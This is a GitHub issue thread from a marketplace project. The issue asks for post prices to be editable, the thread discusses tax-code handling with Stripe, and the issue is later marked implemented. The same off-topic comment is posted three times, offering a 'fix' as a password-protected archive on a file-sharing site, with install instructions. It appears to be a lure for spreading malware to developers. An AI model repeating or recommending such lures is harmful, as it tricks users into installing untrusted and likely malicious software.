### ISSUE TITLE
Edit Price in Edit Posts

### ISSUE THREAD

**Issue by r-southworth** [datagrove/marketplace-us#148]
**Is your feature request related to a problem? Please describe.**
When editing a post I can't edit the price

**Describe the solution you'd like**
Be able to change the price from free to paid, paid to free, and change the amounts between different levels of paid

**Describe alternatives you've considered**
None, this seems like something that should be editable. 

**Additional context**
The reason it is currently not editable is the handling of tax code when the item is changed from having been originally free to paid. When the item is set to free it gets a default tax code but when it is changed to paid the seller should be responsible for selecting the appropriate tax code - however once there is a user set tax code we don't plan on letting them change that  since if the tax code needs to change then it should probably be a new item anyway. I am not even certain if stripe will let you edit a tax code through the API

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by r-southworth** [comment]
Implemented
